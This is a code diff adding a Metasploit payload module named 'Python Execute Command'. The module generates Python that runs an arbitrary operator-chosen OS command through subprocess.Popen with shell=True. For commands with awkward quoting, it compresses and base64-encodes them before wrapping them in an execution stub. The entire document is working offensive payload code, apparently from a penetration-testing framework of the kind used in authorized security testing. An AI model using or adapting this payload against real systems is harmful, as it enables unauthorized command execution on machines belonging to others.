|
| 1 | +module MetasploitModule |
| 2 | + CachedSize = :dynamic |
| 3 | + |
| 4 | + include Msf::Payload::Single |
| 5 | + include Msf::Payload::Python |
| 6 | + |
| 7 | + def initialize(info = {}) |
| 8 | + super( |
| 9 | + merge_info( |
| 10 | + info, |
| 11 | + 'Name' => 'Python Execute Command', |
| 12 | + 'Description' => 'Execute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.', |
| 13 | + 'Author' => 'Spencer McIntyre', |
| 14 | + 'License' => MSF_LICENSE, |
| 15 | + 'Platform' => 'python', |
| 16 | + 'Arch' => ARCH_PYTHON, |
| 17 | + 'PayloadType' => 'python', |
| 18 | + 'Payload' => { |
| 19 | + 'Offsets' => {}, |
| 20 | + 'Payload' => '' |
| 21 | + } |
| 22 | + ) |
| 23 | + ) |
| 24 | + register_options( |
| 25 | + [ |
| 26 | + OptString.new('CMD', [ true, 'The command string to execute' ]), |
| 27 | + ] |
| 28 | + ) |
| 29 | + end |
| 30 | + |
| 31 | + def generate(_opts = {}) |
| 32 | + super + command_string |
| 33 | + end |
| 34 | + |
| 35 | + def command_string |
| 36 | + py_code = %(from subprocess import Popen,PIPE\n) |
| 37 | + |
| 38 | + # try to just use raw strings if nothing would need to be escaped |
| 39 | + if !datastore['CMD'].include?("'") |
| 40 | + py_code << %(args=[r'#{datastore['CMD']}']\n) |
| 41 | + elsif !datastore['CMD'].include?('"') |
| 42 | + py_code << %(args=[r"#{datastore['CMD']}"]\n) |
| 43 | + elsif !datastore['CMD'].include?("'''") |
| 44 | + py_code << %(args=[r'''#{datastore['CMD']}''']\n) |
| 45 | + elsif !datastore['CMD'].include?('"""') |
| 46 | + py_code << %(args=[r"""#{datastore['CMD']}"""]\n) |
| 47 | + else |
| 48 | + encoded = Rex::Text.encode_base64(Rex::Text.zlib_deflate(datastore['CMD'])) |
| 49 | + py_code << %{import zlib,base64;args=[zlib.decompress(base64.b64decode('#{encoded}')).decode()]\n} |
| 50 | + end |
| 51 | + |
| 52 | + py_code << %{Popen(args,shell=True,stdin=PIPE,stdout=PIPE,stderr=PIPE)\n} |
| 53 | + |
| 54 | + py_create_exec_stub(py_code) |
| 55 | + end |
| 56 | +end |
0 commit comments